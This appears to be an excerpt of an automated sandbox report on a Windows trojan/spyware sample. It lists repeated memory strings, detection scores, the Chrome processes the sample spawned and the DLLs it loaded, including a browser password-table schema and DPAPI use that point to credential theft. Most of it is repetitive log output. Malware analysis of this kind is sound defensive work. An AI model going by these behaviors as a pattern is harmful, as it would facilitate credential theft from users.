Source: z3IxCpcpg4.exe, 00000000.00000003.2429345638.000000000576E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2436869434.0000000005882000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2439625817.00000000059AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435386575.000000000576F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2437981257.000000000598C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429839888.00000000058C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2439164958.0000000005767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2478885176.000000000516F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2437294817.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431780178.000000000582A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2438505305.000000000576E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2434185489.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2427395034.0000000005774000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435511801.0000000005865000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432393510.000000000583F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2428845650.000000000576D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2433176020.0000000005843000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2436035443.000000000576B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2433539569.000000000591E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431075175.0000000005832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2442200441.00000000058BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2443252978.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000002.2570824171.0000000005A30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000002.2571276004.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2437831885.0000000005876000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2438958079.0000000005888000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431657003.000000000576F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2440206498.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2438287600.000000000588A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2433292445.0000000005766000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2438657503.000000000588F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431415610.0000000005772000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2427168345.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2433418126.0000000005845000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429446030.0000000005806000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432261653.000000000576D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431298168.000000000582B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2427700974.000000000576F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431186277.000000000576B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2428947584.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2443713159.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2434391614.0000000005850000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2442792603.00000000059FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2436586329.000000000596E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2437011598.000000000576D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2439452562.000000000588B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429047870.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2433982594.0000000005863000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432761123.0000000005766000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2427517158.0000000005813000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000002.2570105823.0000000005160000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2441533777.0000000005768000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2437147031.000000000587C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2478128497.0000000005226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2443473225.00000000059FE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429253709.0000000005815000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435775223.000000000585E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2440490674.0000000005770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2436724946.000000000576E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2437681838.0000000005769000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2442558195.00000000058B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2433062269.0000000005769000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2434601118.000000000593D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429149492.000000000576E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2427973309.0000000005813000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429644589.0000000005767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2442030496.0000000005774000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435905315.000000000595E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2430239369.000000000576D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432521094.0000000005768000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435641061.0000000005767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2439784711.0000000005767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2423683834.00000000055A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2430477066.000000000581D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2438131909.000000000576B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2434808767.0000000005770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435131570.0000000005768000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2423683834.0000000005566000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429940381.000000000576E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431535964.0000000005831000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2436177910.000000000586F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2441375951.00000000058A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2478004993.0000000005566000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2439947785.0000000005891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2430039595.0000000005823000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2427300797.00000000053C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429742291.0000000005815000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2441669217.000000000589D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2437478975.0000000005881000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2442997996.0000000005769000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2430692320.00000000058CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432883714.0000000005843000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2438810918.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2429543719.00000000058AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435259350.000000000585E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2430950736.0000000005770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2435003091.000000000585B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe

Source: z3IxCpcpg4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: z3IxCpcpg4.exe

Static PE information: Section: ZLIB complexity 0.9993936376633987

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/67@17/7

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Code function: 0_2_00F32070 CoCreateInstance,

0_2_00F32070

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: z3IxCpcpg4.exe, 00000000.00000003.2211912795.000000000518F000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2212206983.0000000005175000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2236084602.000000000519C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: z3IxCpcpg4.exe	Virustotal: Detection: 66%
Source: z3IxCpcpg4.exe	ReversingLabs: Detection: 63%

Source: z3IxCpcpg4.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: z3IxCpcpg4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: z3IxCpcpg4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: z3IxCpcpg4.exe	String found in binary or memory: Q>"RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeQ

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

File read: C:\Users\user\Desktop\z3IxCpcpg4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\z3IxCpcpg4.exe "C:\Users\user\Desktop\z3IxCpcpg4.exe"
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 --field-trial-handle=2272,i,1615752867562704235,17877190940150072882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1160 --field-trial-handle=2012,i,15433138936356664886,13501548985382534972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 --field-trial-handle=2272,i,1615752867562704235,17877190940150072882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1160 --field-trial-handle=2012,i,15433138936356664886,13501548985382534972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: dpapi.dll	Jump to behavior
